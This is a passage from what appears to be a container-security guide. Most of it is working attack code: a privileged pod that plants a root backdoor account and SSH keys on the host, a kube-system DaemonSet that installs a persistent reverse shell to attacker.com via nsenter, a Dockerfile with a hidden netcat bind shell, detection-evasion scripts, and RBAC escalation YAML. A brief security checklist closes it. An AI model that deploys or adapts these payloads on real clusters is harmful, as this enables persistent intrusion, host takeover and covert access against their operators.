echo 'backdoor:$6$salt$encrypted_password' >> /host/etc/shadow
# Install SSH keys
mkdir -p /host/root/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2E...' >> /host/root/.ssh/authorized_keys
chmod 600 /host/root/.ssh/authorized_keys
# Create systemd service for persistence
cat > /host/etc/systemd/system/system-monitor.service << EOF
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do sleep 60; done'
Restart=always
User=root
[Install]
WantedBy=multi-user.target
EOF
# Enable the service
chroot /host systemctl enable system-monitor.service
"""
],
"securityContext": {
"privileged": True
},
"volumeMounts": [
{
"name": "host-root",
"mountPath": "/host"
}
]
}
return init_container_config
def deploy_daemonset_persistence(self):
"""Deploy malicious DaemonSet for cluster-wide persistence"""
daemonset_config = {
"apiVersion": "apps/v1",
"kind": "DaemonSet",
"metadata": {
"name": "system-monitor",
"namespace": "kube-system",
"labels": {
"app": "system-monitor"
}
},
"spec": {
"selector": {
"matchLabels": {
"app": "system-monitor"
}
},
"template": {
"metadata": {
"labels": {
"app": "system-monitor"
}
},
"spec": {
"hostNetwork": True,
"hostPID": True,
"containers": [
{
"name": "monitor",
"image": "alpine:latest",
"command": ["/bin/sh"],
"args": [
"-c",
"""
# Install backdoor
nsenter -t 1 -m -u -i -n -p -- bash -c '
# Create reverse shell service
cat > /etc/systemd/system/network-check.service << EOF
[Unit]
Description=Network Connectivity Check
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable network-check.service
systemctl start network-check.service
'
# Keep container running
while true; do sleep 3600; done
"""
],
"securityContext": {
"privileged": True
},
"volumeMounts": [
{
"name": "host-root",
"mountPath": "/host"
}
]
}
],
"volumes": [
{
"name": "host-root",
"hostPath": {
"path": "/"
}
}
],
"tolerations": [
{
"operator": "Exists"
}
]
}
}
}
}
return daemonset_config
def create_container_image_backdoor(self, base_image):
"""Create backdoored container image"""
dockerfile_content = f"""
FROM {base_image}
# Install backdoor dependencies
RUN apt-get update && apt-get install -y curl netcat-openbsd && rm -rf /var/lib/apt/lists/*
# Create backdoor script
RUN echo '#!/bin/bash' > /usr/local/bin/health-check && \\
echo 'if [ "$ENABLE_BACKDOOR" = "true" ]; then' >> /usr/local/bin/health-check && \\
echo ' nc -l -p 9999 -e /bin/bash &' >> /usr/local/bin/health-check && \\
echo 'fi' >> /usr/local/bin/health-check && \\
echo 'exec "$@"' >> /usr/local/bin/health-check && \\
chmod +x /usr/local/bin/health-check
# Hide the backdoor in entrypoint
ENTRYPOINT ["/usr/local/bin/health-check"]
"""
backdoor_instructions = {
"dockerfile": dockerfile_content,
"build_command": f"docker build -t {base_image}-secure .",
"activation": "Set environment variable ENABLE_BACKDOOR=true to activate",
"access": "Connect to port 9999 for shell access"
}
return backdoor_instructions
# Container evasion techniques
def implement_container_evasion():
"""Implement various container detection evasion techniques"""
evasion_script = '''
#!/bin/bash
# Container evasion techniques
# Function to detect if running in container
detect_container() {
# Check for container-specific files
if [ -f "/.dockerenv" ]; then
return 0 # In container
fi
# Check cgroup
if grep -q "docker\\|lxc\\|kubepods" /proc/1/cgroup 2>/dev/null; then
return 0 # In container
fi
# Check for container runtime processes
if ps aux | grep -E "(containerd|dockerd|kubelet)" >/dev/null 2>&1; then
return 0 # Likely in container environment
fi
return 1 # Not in container
}
# Evasion technique 1: Masquerade as legitimate process
masquerade_process() {
# Copy legitimate binary
cp /bin/sleep /tmp/systemd
# Modify process name
exec -a systemd /tmp/systemd 3600 &
}
# Evasion technique 2: Hide in existing process space
hide_in_process() {
# Find long-running process
TARGET_PID=$(ps aux | grep -v grep | grep -E "(systemd|init)" | head -1 | awk '{print $2}')
if [ ! -z "$TARGET_PID" ]; then
# Inject into process namespace
nsenter -t $TARGET_PID -p -m bash -c '
# Run malicious code in target namespace
while true; do
# Covert channel communication
sleep 60
done
' &
fi
}
# Evasion technique 3: Filesystem timestamp manipulation
manipulate_timestamps() {
# Create files with legitimate timestamps
touch -d "2023-01-01" /tmp/system-config
# Modify access times to match system files
SYSTEM_TIME=$(stat -c %Y /etc/passwd)
touch -d "@$SYSTEM_TIME" /tmp/system-config
}
# Evasion technique 4: Memory-only execution
memory_only_execution() {
# Base64 encoded payload
PAYLOAD="IyEvYmluL2Jhc2gKd2hpbGUgdHJ1ZTsgZG8Kc2xlZXAgNjAKZG9uZQ=="
# Decode and execute in memory
echo "$PAYLOAD" | base64 -d | bash &
}
# Main evasion implementation
if detect_container; then
echo "[*] Container environment detected - deploying evasion"
masquerade_process
hide_in_process
manipulate_timestamps
memory_only_execution
else
echo "[*] Host environment detected - standard execution"
fi
'''
return evasion_script
def generate_kubernetes_rbac_bypass():
"""Generate RBAC bypass techniques"""
rbac_bypass_yaml = '''
# RBAC bypass using service account token projection
apiVersion: v1
kind: Pod
metadata:
name: rbac-bypass-pod
namespace: default
spec:
serviceAccountName: default
containers:
- name: bypass
image: alpine:latest
command: ["/bin/sh"]
args: ["-c", "while true; do sleep 3600; done"]
volumeMounts:
- name: projected-token
mountPath: /var/run/secrets/kubernetes.io/serviceaccount-bypass
readOnly: true
volumes:
- name: projected-token
projected:
sources:
- serviceAccountToken:
path: token
expirationSeconds: 7200
audience: api
- configMap:
name: kube-root-ca.crt
items:
- key: ca.crt
path: ca.crt
- downwardAPI:
items:
- path: namespace
fieldRef:
fieldPath: metadata.namespace
---
# ClusterRole with minimal permissions that can be escalated
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-reader-escalatable
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["pods/exec"]
verbs: ["create"] # This can be used for privilege escalation
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: escalatable-binding
subjects:
- kind: ServiceAccount
name: default
namespace: default
roleRef:
kind: ClusterRole
name: pod-reader-escalatable
apiGroup: rbac.authorization.k8s.io
'''
return rbac_bypass_yaml
Container security represents one of the most complex challenges in modern cybersecurity, requiring a multi-layered approach that spans from individual container configurations to cluster-wide orchestration security. The attack vectors demonstrated in this guide highlight the critical importance of implementing comprehensive security controls throughout the container lifecycle.
Defense in Depth
Least Privilege Access
Immutable Infrastructure
Continuous Monitoring
# Comprehensive Container Security Checklist
Image_Security:
- [ ] Base images from trusted sources
- [ ] Regular vulnerability scanning
- [ ] Image signing and verification
- [ ] Minimal base images (distroless when possible)
- [ ] No secrets in images or environment variables
Container_Configuration:
- [ ] Non-root user execution
- [ ] Read-only root filesystem
- [ ] Dropped dangerous capabilities
- [ ] Resource limits configured
- [ ] No privileged containers
Kubernetes_Security:
- [ ] Network policies implemented
- [ ] Pod Security Standards enforced
- [ ] RBAC with least privilege
- [ ] Secrets management (not in env vars)
- [ ] Admission controllers configured
Runtime_Security:
- [ ] Runtime threat detection
- [ ] Behavioral monitoring
- [ ] Incident response procedures
- [ ] Regular security assessments
- [ ] Container escape detection
Supply_Chain_Security:
- [ ] Image provenance verification
- [ ] Dependency scanning
- [ ] Build pipeline security
- [ ] Artifact signing
- [ ] Secure distribution channels
As container technologies continue to evolve, several trends will shape the future security landscape:
Zero Trust Architecture for Containers
AI-Powered Container Security
Service Mesh Security
Quantum-Safe Container Cryptography
The container security landscape will continue to evolve rapidly, requiring security professionals to stay current with emerging threats, technologies, and best practices. Organizations that invest in comprehensive container security programs today will be best positioned to defend against tomorrow's advanced threats.
Remember: in containerized environments, security is not a destination but a continuous journey of assessment, improvement, and adaptation to emerging challenges.